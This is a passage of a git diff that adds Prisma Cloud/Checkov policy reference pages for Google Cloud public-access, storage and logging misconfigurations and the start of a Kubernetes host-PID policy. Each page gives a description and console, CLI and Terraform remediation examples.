+  topic = google_pubsub_topic.example.name
+  role  = "roles/pubsub.publisher"
+
+  members = [
+-   "allUsers",
+-   "allAuthenticatedUsers",
+  ]
+}
+----
+
+
+[source,go]
+----
+resource "google_pubsub_topic_iam_member" "public_member" {
+  topic = google_pubsub_topic.example.name
+  role  = "roles/pubsub.publisher"
+
+- member = "allUsers"
+- member = "allAuthenticatedUsers"
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-vertex-ai-workbench-does-not-have-public-ips.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-vertex-ai-workbench-does-not-have-public-ips.adoc
new file mode 100644
index 000000000..8842d89fb
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-vertex-ai-workbench-does-not-have-public-ips.adoc
@@ -0,0 +1,105 @@
+== GCP Vertex AI instances are not private
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 60313d7a-ff41-40ed-8bf0-74087cc0be9e
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/VertexAIPrivateInstance.py[CKV_GCP_89]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+*Vertex AI Workbench* is a data science service offered by GCP that leverages https://jupyterlab.readthedocs.io/en/stable/getting_started/overview.html[JupyterLab] to explore and access data.
+Workbenches have public IPs assigned by default, which can increase your attack surface and expose sensitive data.
+We recommend you only assign private IPs to Vertex AI Workbenches.
+
+////
+=== Fix - Runtime
+
+
+*GCP Console*
+
+
+It is not currently possible to edit a *Vertex AI Workbench* network setting to remove or add a public IP.
+To create a *Vertex AI Workbench* with a private IP:
+
+. Log in to the GCP Console at https://console.cloud.google.com.
+
+. Navigate to https://console.cloud.google.com/vertex-ai/workbench/create-instance[Vertex AI Workbench].
+
+. Scroll down to the _Networking_ section and expand it.
+
+. Locate the _External IP_ dropdown and select *None*.
+
+
+*CLI Command*
+
+
+It is not currently possible to edit a *Vertex AI Workbench* network setting to remove or add a public IP.
+To create a private *Vertex AI Workbench*, you need to specify the `--no-public-ip` flag.
+For example:
+
+
+[source,shell]
+----
+# To create an instance from a VmImage name
+gcloud beta notebooks instances create example-instance \
+  --vm-image-project=deeplearning-platform-release \
+  --vm-image-name=tf2-2-1-cu101-notebooks-20200110 \
+  --machine-type=n1-standard-4 \
+  --location=us-central1-b \
+  --no-public-ip
+----
+
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_notebooks_instance
+* *Field:* no_public_ip
+
+
+[source,go]
+----
+resource "google_notebooks_instance" "public_instance" {
+  name         = "my-notebook"
+  location     = "us-west1-a"
+  machine_type = "e2-medium"
+
+  vm_image {
+    project      = "deeplearning-platform-release"
+    image_family = "tf-latest-cpu"
+  }
+
+- no_public_ip = false
++ no_public_ip = true
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-google-container-registry-repository-is-not-anonymously-or-publicly-accessible.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-google-container-registry-repository-is-not-anonymously-or-publicly-accessible.adoc new file mode 100644 index
000000000..389b886c4 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-google-container-registry-repository-is-not-anonymously-or-publicly-accessible.adoc @@ -0,0 +1,134 @@
+== GCP Container Registry repositories are anonymously or publicly accessible
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 027a2049-cb36-4d7a-aea7-2a8e6e84aeae
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml[CKV2_GCP_9]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+_Google Container Registry (GCR)_ is a GCP service that contains repositories for your container images.
+Because GCR images are stored in GCS, a GCR repository is publicly accessible if the host location's underlying storage bucket is publicly accessible.
+Public GCR repositories can put your data at risk of exposure and should be adjusted to a more secure (private) configuration.
+We recommend you ensure that neither anonymous nor public access to *GCR repositories* is allowed.
+
+////
+=== Fix - Runtime
+
+
+*GCP Console*
+
+
+To remove anonymous or public access to your GCR repositories:
+
+. Log in to the GCP Console at https://console.cloud.google.com.
+
+. Navigate to https://console.cloud.google.com/gcr/settings[GCR Settings].
+
+. Under _Public access_, locate the repositories that say *PUBLIC* under the _Visibility_ column.
+
+. Select the dropdown and switch to *PRIVATE*.
+
+
+*CLI Command*
+
+
+To remove anonymous or public access to your GCR repositories, use the `gsutil` command:
+
+
+[source,shell]
+----
+gsutil iam ch -d PRINCIPAL gs://BUCKET-NAME
+----
+
+Replace *PRINCIPAL* with either _allUsers_ or _allAuthenticatedUsers_ depending on your Checkov alert.
+Replace *BUCKET-NAME* with the GCS bucket where your images are stored.
+The *BUCKET-NAME* can be determined by executing `gsutil ls`; your Container Registry bucket URL will be listed as `gs://artifacts.PROJECT-ID.appspot.com` or `gs://STORAGE-REGION.artifacts.PROJECT-ID.appspot.com`, where *PROJECT-ID* and *STORAGE-REGION* correspond to your GCP project ID and the region where your GCR repository is configured.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_storage_bucket_iam_binding
+* *Field:* members
+* *Resource:* google_storage_bucket_iam_member
+* *Field:* member
+
+Google Container Registry (GCR) does not have IAM-specific resources in Terraform.
+Instead, GCR IAM is handled via the GCS IAM resources seen in the below examples.
+
+
+[source,go]
+----
+resource "google_storage_bucket_iam_binding" "gcr_public_binding" {
+  bucket = google_storage_bucket.default.name
+  role   = "roles/storage.viewer"
+
+  members = [
+-   "allUsers",
+-   "allAuthenticatedUsers",
+  ]
+}
+----
+
+
+[source,go]
+----
+resource "google_storage_bucket_iam_member" "gcr_public_member" {
+  bucket = google_storage_bucket.default.name
+  role   = "roles/storage.viewer"
+
+- member = "allUsers"
+- member = "allAuthenticatedUsers"
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/google-cloud-public-policies.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/google-cloud-public-policies.adoc
new file mode 100644
index 000000000..32991b0d1
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-public-policies/google-cloud-public-policies.adoc
@@ -0,0 +1,69 @@
+== Google Cloud Public Policies
+
+[width=85%]
+[cols="1,1,1"]
+|===
+|Policy|Checkov Check ID| Severity
+
+|xref:bc-gcp-public-1.adoc[GCP Storage buckets has public access to all authenticated users]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py[CKV_GCP_28]
+|HIGH
+
+
+|xref:bc-gcp-public-2.adoc[GCP VM instance with the external IP address]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py[CKV_GCP_40]
+|MEDIUM
+
+
+|xref:ensure-cloud-run-service-is-not-anonymously-or-publicly-accessible.adoc[GCP Cloud Run
services are anonymously or publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py[CKV_GCP_102] +|MEDIUM + + +|xref:ensure-gcp-artifact-registry-repository-is-not-anonymously-or-publicly-accessible.adoc[GCP Artifact Registry repositories are anonymously or publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py[CKV_GCP_101] +|HIGH + + +|xref:ensure-gcp-bigquery-table-is-not-publicly-accessible.adoc[GCP BigQuery Tables are anonymously or publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py[CKV_GCP_100] +|HIGH + + +|xref:ensure-gcp-cloud-dataflow-job-has-public-ips.adoc[GCP Dataflow jobs are not private] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataflowPrivateJob.py[CKV_GCP_94] +|HIGH + + +|xref:ensure-gcp-cloud-kms-cryptokey-is-not-anonymously-or-publicly-accessible.adoc[GCP KMS crypto key is anonymously accessible] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml[CKV2_GCP_6] +|HIGH + + +|xref:ensure-gcp-dataproc-cluster-does-not-have-a-public-ip.adoc[GCP Dataproc Clusters have public IPs] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataprocPublicIpCluster.py[CKV_GCP_103] +|HIGH + + +|xref:ensure-gcp-dataproc-cluster-is-not-anonymously-or-publicly-accessible.adoc[GCP Dataproc clusters are anonymously or publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py[CKV_GCP_98] +|HIGH + + +|xref:ensure-gcp-pubsub-topic-is-not-anonymously-or-publicly-accessible.adoc[GCP Pub/Sub Topics are anonymously or publicly accessible] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py[CKV_GCP_99]
+|MEDIUM
+
+
+|xref:ensure-gcp-vertex-ai-workbench-does-not-have-public-ips.adoc[GCP Vertex AI instances are not private]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/VertexAIPrivateInstance.py[CKV_GCP_89]
+|HIGH
+
+
+|xref:ensure-google-container-registry-repository-is-not-anonymously-or-publicly-accessible.adoc[GCP Container Registry repositories are anonymously or publicly accessible]
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml[CKV2_GCP_9]
+|HIGH
+
+
+|===
+
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-gcs-1.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-gcs-1.adoc
new file mode 100644
index 000000000..28d0c8a8a
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-gcs-1.adoc
@@ -0,0 +1,76 @@
+== Google storage buckets are not encrypted
+
+
+=== Description
+
+
+Google Storage Buckets is a Google service to store unstructured data that can be accessed by a key.
+By default, Google encrypts and decrypts the data to and from disk using a Google-managed encryption key.
+Google Cloud Storage encrypts data on the server side, before it is written to disk, at no additional charge.
+We recommend you opt in to server-side encryption with customer-managed keys wherever available.
+
+////
+=== Fix - Runtime
+
+
+*GCP Console*
+
+
+To configure your Cloud Storage service account with permission to use your Cloud KMS key (customer-managed encryption keys) using the GCP Console, follow these steps:
+
+. Log in to the GCP Console at https://console.cloud.google.com.
+
+. Navigate to *Cloud Key Management Service Keys*.
+
+.
Click on the name of the key ring that contains the desired key.
+
+. Select the key's checkbox.
++
+The *Permissions* tab in the right window pane becomes available.
+
+. In the *Add members* dialog, enter the email address of the Cloud Storage service account you are granting access to.
+
+. In the *Select a role* drop down, select *Cloud KMS CryptoKey Encrypter/Decrypter*.
+
+. Click *Add*.
+
+
+*CLI Command*
+
+
+Use the `gsutil kms authorize` command to give the service account associated with your bucket permission to encrypt and decrypt objects using your Cloud KMS key:
+
+----
+gsutil kms authorize \
+  -p PROJECT_STORING_OBJECTS \
+  -k KEY_RESOURCE
+----
+
+PROJECT_STORING_OBJECTS is the ID of the project containing the objects you want to encrypt or decrypt, for example `my-pet-project`.
+KEY_RESOURCE is your Cloud KMS key resource, for example `projects/my-pet-project/locations/us-east1/keyRings/my-key-ring/cryptoKeys/my-key`.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_storage_bucket
+* *Arguments:* `encryption` - (Optional) The bucket's encryption configuration.
+`default_kms_key_name` specifies a Cloud KMS key that will be used to encrypt objects inserted into this bucket if no other encryption method is specified.
+Make sure the crypto key is available in the location in which the bucket is created.
+ + +[source,go] +---- +resource "google_storage_bucket" "auto-expire" { + name = "auto-expiring-bucket" + location = "US" + force_destroy = true + ++ encryption { ++ default_kms_key_name = google_kms_crypto_key.example.id # illustrative reference to your Cloud KMS key ++ } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-gcs-2.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-gcs-2.adoc new file mode 100644 index 000000000..ed1cd9bc1 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-gcs-2.adoc @@ -0,0 +1,100 @@ +== GCP cloud storage bucket with uniform bucket-level access disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f0e09192-0716-11eb-adc1-0242ac120002 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleStorageBucketUniformAccess.py[CKV_GCP_29] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +For a user to access a Cloud Storage resource, only one of the systems needs to grant the user permission. +Cloud IAM is used throughout Google Cloud and allows you to grant a variety of permissions at bucket and project levels. +ACLs have limited permission options, are used only by Cloud Storage, and allow you to grant permissions on a per-object basis. +Cloud Storage has uniform bucket-level access that supports a uniform permissions system. +Using this feature disables ACLs for all Cloud Storage resources. + +Access to Cloud Storage resources is granted exclusively through Cloud IAM. +Enabling uniform bucket-level access guarantees that if a Storage bucket is not publicly accessible, no object in the bucket is publicly accessible. + +We recommend you enable uniform bucket-level access on Cloud Storage buckets.
+Uniform bucket-level access is used to unify and simplify how you grant access to your Cloud Storage resources. +Cloud Storage offers two systems that act in parallel for granting users permission to access your buckets and objects: + +* Cloud Identity and Access Management (Cloud IAM) +* Access Control Lists (ACLs). + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/storage/browser[Cloud Storage]. + +. From the * list of buckets*, select the name of the desired bucket. + +. Near the top of the page, click the * Permissions* tab. + +. In the text box that begins * This bucket uses fine-grained access control*, click * Edit*. + +. A pop-up menu opens. ++ +Select * Uniform*. + +. Click * Save*. + + +* CLI Command* + + +Set the option to on for uniformbucketlevelaccess, using the following command: `gsutil uniformbucketlevelaccess set on gs://BUCKET_NAME/` +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_storage_bucket +* *Arguments:* uniform_bucket_level_access (Optional) Set to true to enable uniform bucket-level access. + + +[source,go] +---- +resource "google_storage_bucket" "examplea" { + name = "terragoat-${var.environment}" + bucket_policy_only = true + ++ uniform_bucket_level_access = true +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-logging-2.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-logging-2.adoc new file mode 100644 index 000000000..3cc12df04 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-logging-2.adoc @@ -0,0 +1,58 @@ +== GCP Storage Bucket does not have Access and Storage Logging enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 
aee21917-3cff-4004-b965-79fb52cff952 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudStorageLogging.py[CKV_GCP_62] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Some resources require a record of who accesses them and when. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_storage_bucket +* *Arguments:* logging/log_bucket (Optional) Specifies a bucket in which to store access logs. + + +[source,go] +---- +resource "google_storage_bucket" "logging" { + name = "jgwloggingbucket" + location = var.location + uniform_bucket_level_access = true ++ logging { ++ log_bucket = "mylovelybucket" ++ } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-logging-3.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-logging-3.adoc new file mode 100644 index 000000000..7779da1f9 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/bc-gcp-logging-3.adoc @@ -0,0 +1,59 @@ +== GCP storage bucket is logging to itself + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 53dd2bfd-1b3c-4b7a-9eea-bad3c148cd15 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudStorageSelfLogging.py[CKV_GCP_63] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This check ensures that the specified logging bucket is not the bucket itself. +A bucket must not log access to itself; logging requires a second, separate bucket.
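+ +A compliant configuration routes access logs to a second, separate bucket. The following sketch is illustrative only; the log-bucket name and the cross-resource reference are assumptions, not taken from the policy source: + +[source,go] +---- +# Separate bucket that receives the access logs (illustrative) +resource "google_storage_bucket" "access_logs" { + name = "mylovelybucket-logs" + location = var.location +} + +resource "google_storage_bucket" "mylovelybucket" { + name = "mylovelybucket" + location = var.location + uniform_bucket_level_access = true + logging { + # point at the second bucket, never at this bucket itself + log_bucket = google_storage_bucket.access_logs.name + } +} +----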
+ + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_storage_bucket + +This check triggers if you attempt to self-reference: + + +[source,go] +---- +resource "google_storage_bucket" "mylovelybucket" { + name = "mylovelybucket" + location = var.location + uniform_bucket_level_access = true + logging { + log_bucket = "mylovelybucket" + } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/google-cloud-storage-gcs-policies.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/google-cloud-storage-gcs-policies.adoc new file mode 100644 index 000000000..1b8b4308d --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-storage-gcs-policies/google-cloud-storage-gcs-policies.adoc @@ -0,0 +1,24 @@ +== Google Cloud Storage (GCS) Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-gcp-gcs-2.adoc[GCP cloud storage bucket with uniform bucket-level access disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleStorageBucketUniformAccess.py[CKV_GCP_29] +|MEDIUM + + +|xref:bc-gcp-logging-2.adoc[GCP Storage Bucket does not have Access and Storage Logging enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudStorageLogging.py[CKV_GCP_62] +|MEDIUM + + +|xref:bc-gcp-logging-3.adoc[GCP storage bucket is logging to itself] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudStorageSelfLogging.py[CKV_GCP_63] +|LOW + + +|=== + diff --git a/code-security/policy-reference/google-cloud-policies/logging-policies-1/bc-gcp-logging-1.adoc b/code-security/policy-reference/google-cloud-policies/logging-policies-1/bc-gcp-logging-1.adoc new file mode 100644 index 000000000..13ebb9c9b --- /dev/null +++ 
b/code-security/policy-reference/google-cloud-policies/logging-policies-1/bc-gcp-logging-1.adoc @@ -0,0 +1,105 @@ +== GCP VPC Flow logs for the subnet is set to Off + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3a83223b-821a-494b-8456-6dfc22fc58d9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleSubnetworkLoggingEnabled.py[CKV_GCP_26] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Flow Logs capture information about IP traffic going to and from network interfaces. +This information can be used to detect anomalous traffic and to gain insight into security workflows. +You can view and retrieve flow log data in Stackdriver Logging. +VPC networks and subnetworks provide logically isolated and secure network partitions to launch Google Cloud Platform (GCP) resources. +When Flow Logs are enabled for a subnet, VMs within that subnet report on all Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) flows. +Each VM samples the inbound and outbound TCP and UDP flows it sees, whether the flow is to or from another VM, a host in the on-premises datacenter, a Google service, or a host on the Internet. +If two GCP VMs are communicating and both are in subnets that have VPC Flow Logs enabled, both VMs report the flows. +We recommend you set *Flow Logs* to *On* to capture this data. +Because the volume of logs may be high, you may wish to enable flow logs only for business-critical VPC Network Subnets. +Flow Logs supports the following use cases: + +* Network monitoring +* Understanding network usage and optimizing network traffic expenses +* Network forensics +* Real-time security analysis + +//// +=== Fix - Runtime + + +* GCP Console* + + + +. Open the VPC network GCP Console https://console.cloud.google.com/networking/networks/list. + +. 
Click the name of a subnet to display the * Subnet details* page. + +. Click the * EDIT* button. + +. Set * Flow Logs * to * On*. + +. Click * Save*. + + +* CLI Command* + + +To enable VPC Flow Logs for a network subnet, run the following command: +---- +gcloud compute networks subnets update [SUBNET_NAME] +--region [REGION] +--enable-flow-logs +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_subnetwork +* *Arguments:* log_config + + +[source,go] +---- +resource "google_compute_subnetwork" "example" { + name = "log-test-subnetwork" + ip_cidr_range = "10.2.0.0/16" + region = "us-central1" + network = google_compute_network.custom-test.id + ++ log_config { + aggregation_interval = "INTERVAL_10_MIN" + flow_sampling = 0.5 + metadata = "INCLUDE_ALL_METADATA" + } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/logging-policies-1/ensure-that-cloud-audit-logging-is-configured-properly-across-all-services-and-all-users-from-a-project.adoc b/code-security/policy-reference/google-cloud-policies/logging-policies-1/ensure-that-cloud-audit-logging-is-configured-properly-across-all-services-and-all-users-from-a-project.adoc new file mode 100644 index 000000000..8f6064637 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/logging-policies-1/ensure-that-cloud-audit-logging-is-configured-properly-across-all-services-and-all-users-from-a-project.adoc @@ -0,0 +1,122 @@ +== GCP Project audit logging is not configured properly across all services and all users in a project + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 237d9785-5d84-4b1d-9a46-d21f702648f0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml[CKV2_GCP_5] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== 
Description + + +It is recommended that Cloud Audit Logging is configured to track all admin activities and read/write access to user data. +Cloud Audit Logging maintains two audit logs for each project, folder, and organization: Admin Activity and Data Access. + +. Admin Activity logs contain log entries for API calls or other administrative actions that modify the configuration or metadata of resources. ++ +Admin Activity audit logs are enabled for all services and cannot be configured. + +. Data Access audit logs record API calls that create, modify, or read user-provided data. ++ +These are disabled by default and should be enabled. ++ +There are three kinds of Data Access audit log information: ++ +** Admin read: Records operations that read metadata or configuration information. ++ +Admin Activity audit logs record writes of metadata and configuration information that cannot be disabled. ++ +** Data read: Records operations that read user-provided data. ++ +** Data write: Records operations that write user-provided data. ++ +It is recommended to have an effective default audit config configured in such a way that: + +. log_type is set to DATA_READ (to log user activity) and DATA_WRITE (to log changes/tampering to user data). + +. the audit config is enabled for all services supported by the Data Access audit logs feature. + +. Logs are captured for all users, i.e., there are no exempted users in any of the audit config sections. ++ +This will ensure overriding the audit config will not contradict the requirement.
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_project +* *Arguments:* google_project_iam_audit_config + + +[source,go] +---- +resource "google_project" "good_project" { + name = "good" + project_id = "123456" +} + + +resource "google_project" "bad_project" { + name = "bad" + project_id = "123456" +} + + +resource "google_project_iam_audit_config" "project_good_audit" { + project = google_project.good_project.id ++ service = "allServices" + audit_log_config { + log_type = "ADMIN_READ" + } + + audit_log_config { + log_type = "DATA_READ" + } + + audit_log_config { + log_type = "DATA_WRITE" + } + +} + +resource "google_project_iam_audit_config" "project_bad_audit" { + project = google_project.bad_project.id +- service = "someService" + audit_log_config { + log_type = "ADMIN_READ" + } + + audit_log_config { + log_type = "DATA_READ" +- exempted_members = [ +- "user:joebloggs@hashicorp.com", +- ] + } + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/logging-policies-1/ensure-that-retention-policies-on-log-buckets-are-configured-using-bucket-lock.adoc b/code-security/policy-reference/google-cloud-policies/logging-policies-1/ensure-that-retention-policies-on-log-buckets-are-configured-using-bucket-lock.adoc new file mode 100644 index 000000000..24c85ea3f --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/logging-policies-1/ensure-that-retention-policies-on-log-buckets-are-configured-using-bucket-lock.adoc @@ -0,0 +1,76 @@ +== GCP Log bucket retention policy is not configured using bucket lock + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 14356227-d5c6-4151-b885-4f21437f820a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml[CKV2_GCP_4] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== 
Description + + +Enabling retention policies on log buckets will protect logs stored in cloud storage buckets from being overwritten or accidentally deleted. +It is recommended to set up retention policies and configure Bucket Lock on all storage buckets that are used as log sinks. +Logs can be exported by creating one or more sinks that include a log filter and a destination. +As Stackdriver Logging receives new log entries, they are compared against each sink. +If a log entry matches a sink's filter, then a copy of the log entry is written to the destination. +Sinks can be configured to export logs to storage buckets. +It is recommended to configure a data retention policy for these cloud storage buckets and to lock the data retention policy, permanently preventing the policy from being reduced or removed. +This way, if the system is ever compromised by an attacker or a malicious insider who wants to cover their tracks, the activity logs are preserved for forensics and security investigations.
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_logging_folder_sink / google_logging_project_sink / google_logging_organization_sink +* *Arguments:* google_storage_bucket + + +[source,go] +---- +resource "google_storage_bucket" "log_bucket_bad" { + name = "organization-logging-bucket" + + retention_policy { + retention_period = 604800 +- is_locked = false + } +} + +resource "google_storage_bucket" "log_bucket_good" { + name = "organization-logging-bucket" + + retention_policy { + retention_period = 604800 ++ is_locked = true + } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/logging-policies-1/logging-policies-1.adoc b/code-security/policy-reference/google-cloud-policies/logging-policies-1/logging-policies-1.adoc new file mode 100644 index 000000000..738352dd7 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/logging-policies-1/logging-policies-1.adoc @@ -0,0 +1,24 @@ +== Logging Policies 1 + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-gcp-logging-1.adoc[GCP VPC Flow logs for the subnet is set to Off] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleSubnetworkLoggingEnabled.py[CKV_GCP_26] +|MEDIUM + + +|xref:ensure-that-cloud-audit-logging-is-configured-properly-across-all-services-and-all-users-from-a-project.adoc[GCP Project audit logging is not configured properly across all services and all users in a project] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml[CKV2_GCP_5] +|MEDIUM + + +|xref:ensure-that-retention-policies-on-log-buckets-are-configured-using-bucket-lock.adoc[GCP Log bucket retention policy is not configured using bucket lock] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml[CKV2_GCP_4] +|MEDIUM + + 
+|=== + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policies.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policies.adoc new file mode 100644 index 000000000..517b9659c --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policies.adoc @@ -0,0 +1 @@ +== Kubernetes Policies diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-1.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-1.adoc new file mode 100644 index 000000000..1970c2a8c --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-1.adoc @@ -0,0 +1,100 @@ +== Containers wishing to share host process ID namespace admitted +// Containers allowed to share host process ID namespace + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 53a5a44c-050a-432c-a0fb-ea655acf14a8 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ShareHostPIDPSP.py[CKV_K8S_1] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +When process namespace sharing is enabled, processes in a container are visible to all other containers in that pod. +This feature can enable configuring cooperating containers that do not include debugging tools, such as a logger sidecar container or troubleshooting container images. +Sharing the host process ID namespace breaks the isolation between container images and can make processes visible to other containers in the pod. +This includes all information in the */proc* directory, which can sometimes include 